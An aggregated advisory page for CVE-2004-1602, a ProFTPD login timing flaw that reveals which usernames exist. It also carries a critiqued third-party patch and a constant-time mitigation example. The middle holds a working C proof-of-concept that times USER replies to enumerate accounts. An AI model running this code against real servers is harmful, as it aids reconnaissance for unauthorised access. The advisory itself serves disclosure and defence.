CVE-2004-1602
CVSS 5.0
Published: 2004-10-15 00:00:00
Last modified: 2016-10-17 22:57:25
NMCOE    

[Original] ProFTPD 1.2.x, including 1.2.8 and 1.2.10, responds in a different amount of time when a given username exists, which allows remote attackers to identify valid usernames by timing the server response.


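[CNNVD] ProFTPd Login Timing Difference User Account Disclosure Vulnerability (CNNVD-200410-018)

        
        ProFTPd is a popular FTP server program.
        When handling the 'USER' command, ProFTPd takes a different amount of time to process invalid usernames, and a remote attacker can use this vulnerability to verify valid user account names.
        LSS Security Team reports that valid user account names can be determined by timing analysis of the code execution paths in the ProFTPd login procedure. By measuring the time between sending the 'USER' command and receiving the reply, a remote user can determine whether an account is valid.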
        

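- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)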

cpe:/a:proftpd_project:proftpd:1.2.9
cpe:/a:proftpd_project:proftpd:1.2.0_rc3
cpe:/a:proftpd_project:proftpd:1.2_pre3
cpe:/a:proftpd_project:proftpd:1.2_pre4
cpe:/a:proftpd_project:proftpd:1.2
cpe:/a:proftpd_project:proftpd:1.2_pre11
cpe:/a:proftpd_project:proftpd:1.2_pre10
cpe:/a:proftpd_project:proftpd:1.2_pre5
cpe:/a:proftpd_project:proftpd:1.2_pre6
cpe:/a:proftpd_project:proftpd:1.2_pre7
cpe:/a:proftpd_project:proftpd:1.2_pre8
cpe:/a:proftpd_project:proftpd:1.2_pre1
cpe:/a:proftpd_project:proftpd:1.2.5_rc1
cpe:/a:proftpd_project:proftpd:1.2_pre2
cpe:/a:proftpd_project:proftpd:1.2.0_rc2
cpe:/a:proftpd_project:proftpd:1.2.0_rc1
cpe:/a:proftpd_project:proftpd:1.2.7_rc2
cpe:/a:proftpd_project:proftpd:1.2.7_rc3
cpe:/a:proftpd_project:proftpd:1.2.8_rc1
cpe:/a:proftpd_project:proftpd:1.2.2_rc3
cpe:/a:proftpd_project:proftpd:1.2.8_rc2
cpe:/a:proftpd_project:proftpd:1.2.1
cpe:/a:proftpd_project:proftpd:1.2.2
cpe:/a:proftpd_project:proftpd:1.2.7
cpe:/a:proftpd_project:proftpd:1.2.8
cpe:/a:proftpd_project:proftpd:1.2.5
cpe:/a:proftpd_project:proftpd:1.2.6
cpe:/a:proftpd_project:proftpd:1.2.9_rc1
cpe:/a:proftpd_project:proftpd:1.2.7_rc1
cpe:/a:proftpd_project:proftpd:1.2.3
cpe:/a:proftpd_project:proftpd:1.2.4
cpe:/a:proftpd_project:proftpd:1.2.9_rc2
cpe:/a:proftpd_project:proftpd:1.2.9_rc3
cpe:/a:proftpd_project:proftpd:1.2_pre9
cpe:/a:proftpd_project:proftpd:1.2.2_rc1

- OVAL (Technical Details for Detection)

No related OVAL definitions found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1602
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1602
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200410-018
(Official data source) CNNVD

- Other Links and Resources

http://marc.info/?l=bugtraq&m=109786760926133&w=2
(UNKNOWN)  BUGTRAQ  20041015 ProFTPD 1.2.x remote users enumeration bug
http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
(VENDOR_ADVISORY)  MISC  http://security.lss.hr/index.php?page=details&ID=LSS-2004-10-02
http://securitytracker.com/id?1011687
(VENDOR_ADVISORY)  SECTRACK  1011687
http://www.securityfocus.com/bid/11430
(VENDOR_ADVISORY)  BID  11430
http://xforce.iss.net/xforce/xfdb/17724
(VENDOR_ADVISORY)  XF  proftpd-info-disclosure(17724)

- Vulnerability Information

ProFTPd Login Timing Difference User Account Disclosure Vulnerability
Medium severity  Design error
2004-10-15 00:00:00 2005-10-20 00:00:00
Remote  
        
        

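- Advisories and Patches

        Temporary workaround:
        If you cannot install a patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * LSS Security Team provides the following third-party patch: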
        proftpd-1.2.10/modules/mod_auth.c
        1867a 1868,1877
        > {
        > unsigned int randa;
        > struct timeval tv;
        > struct timezone tz;
        > gettimeofday (&tv, &tz);
        > srand(tv.tv_usec);
        > randa = rand() % 20000;
        > usleep(randa);
        > }
        >
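        Review bot: the added block reseeds the process-wide PRNG with `srand(tv.tv_usec)` on every pass and then sleeps `rand() % 20000` microseconds, so the delay is uniform noise of at most 20 ms laid over the existing difference rather than something that removes it; the mean reply time for valid and invalid names still differs. Consider recording the time at which the command is received and sleeping until a fixed interval has elapsed, so both paths reply at the same moment. Smaller points: `tz` is never read, so `gettimeofday (&tv, &tz)` can take NULL as its second argument, and the return value of `gettimeofday` is unchecked, which leaves `tv.tv_usec` uninitialised on failure. The `1867a` position carries no context lines, so the patch does not show whether the delay runs on every USER path or only one of them; a comment in the block stating that would help.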
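        Vendor patch:
        ProFTPD Project
        ---------------
        The vendor has not yet provided a patch or upgrade. Users of this software are advised to watch the vendor's home page for the latest version: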
        
        http://www.proftpd.org/

- Vulnerability Information (581)

ProFTPD <= 1.2.10 Remote Users Enumeration Exploit (EDBID:581)
linux remote
2004-10-17 Verified
0 Leon Juranic
/* 
Details 
Vulnerable Systems:
* ProFTPD Version 1.2.10 and below

It is possible to determine which user names are valid, which are special, and which ones do not exist on the remote system. This can be accomplished by code execution path timing analysis attack at the ProFTPd login procedure. There is a very small (but significant) difference in time delay of code execution path between valid and non-valid user names. That can be used to remotely determine the difference between existent and non-existent users. The time delay can be measured by using a simple FTP client that will calculate elapsed time between 'USER' command sent by client, and the server response. Because of the very short response period, elapsed time should be measured in microseconds.

Proof of Concept Code:
LSS has developed simple PoC exploit that is presented here:

// ProFTPd remote users discovery based on code execution time - POC exploit
// Coded by Leon Juranic // http://www.lss.hr
*/

#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <arpa/inet.h>
#include <sys/time.h>

#define PORT 21
#define PROBE 8

main (int argc, char **argv)
{
int sock,n,y;
long dist,stat=0;
struct sockaddr_in sin;
char buf[1024], buf2[1024];
struct timeval tv, tv2;
struct timezone tz, tz2;

printf ("Proftpd remote users discovery exploit\n"
" Coded by Leon / LSS Security\n"
">-------------------------------------<\n");

if (argc != 3) { printf ("usage: %s ",argv[0]); exit(0); }

sock = socket (AF_INET, SOCK_STREAM, 0);
sin.sin_family = AF_INET;
sin.sin_port = htons (PORT);
sin.sin_addr.s_addr = inet_addr (argv[1]);
bzero (sin.sin_zero,8);

connect (sock, (struct sockaddr*)&sin, sizeof(struct sockaddr));

printf ("Login time: ");
n = read (sock,buf2, sizeof(buf2));
for (y=0;y<PROBE;y++) {
gettimeofday (&tv,&tz);
snprintf (buf, sizeof(buf)-1,"USER %s\r\n",argv[2]);
write (sock, buf, strlen(buf));
n = read (sock,buf2, sizeof(buf2));
gettimeofday (&tv2,&tz2);
dist =tv2.tv_usec - tv.tv_usec;
stat += dist;
printf (" %d |",dist);
}
printf ("\nAvrg: %d\n",(stat/PROBE));
close (sock);
}

// milw0rm.com [2004-10-17]
		

- Vulnerability Information

10758
ProFTPD Login Timing Account Name Enumeration
Remote / Network Access Information Disclosure
Loss of Confidentiality
Exploit Public

- Vulnerability Description

ProFTPD contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when an attacker measures the elapsed time between sending the 'USER' command to the server and the server's response, which discloses which user accounts are valid, resulting in a loss of confidentiality.
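
One way to remove the timing difference described above, shown as an added example (not ProFTPD code and not the LSS patch): the reply is held until a fixed interval after the command arrived, so valid and invalid names answer at the same time. `lookup_user`, `handle_user` and the 50 ms `FLOOR_USEC` are hypothetical stand-ins chosen for illustration.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#define FLOOR_USEC 50000 /* assumed floor; must exceed the slowest USER path */

/* Monotonic time in microseconds (immune to wall-clock changes). */
static int64_t now_usec(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (int64_t)ts.tv_sec * 1000000 + ts.tv_nsec / 1000;
}

/* Microseconds still to wait so the reply leaves floor_usec after arrival. */
int64_t pad_remaining_usec(int64_t elapsed_usec, int64_t floor_usec) {
    return elapsed_usec < floor_usec ? floor_usec - elapsed_usec : 0;
}

/* Sleep until start + floor, resuming after signals; returns total elapsed. */
int64_t pad_reply(int64_t start_usec, int64_t floor_usec) {
    int64_t left;
    while ((left = pad_remaining_usec(now_usec() - start_usec, floor_usec)) > 0) {
        struct timespec ts = { (time_t)(left / 1000000), (long)(left % 1000000) * 1000 };
        nanosleep(&ts, NULL);
    }
    return now_usec() - start_usec;
}

/* Hypothetical stand-in for the lookup: existing names take the longer path. */
static void lookup_user(int exists) {
    volatile unsigned long sink = 0;
    unsigned long n = exists ? 400000UL : 1000UL;
    for (unsigned long i = 0; i < n; i++) sink += i;
}

/* Handle one USER command; returns the reply latency in microseconds. */
int64_t handle_user(int exists, int64_t floor_usec) {
    int64_t start = now_usec();
    lookup_user(exists);
    return pad_reply(start, floor_usec);
}

int main(void) {
    printf("missing user: %lld us\n", (long long)handle_user(0, FLOOR_USEC));
    printf("valid user:   %lld us\n", (long long)handle_user(1, FLOOR_USEC));
    return 0;
}
```

If any code path can take longer than the floor, that path replies late and the difference reappears, so the floor has to be sized against the slowest lookup.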

- Timeline

2004-10-15 Unknown
2004-10-15 Unknown

- Solution

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- Related References

- Vulnerability Author

 

 
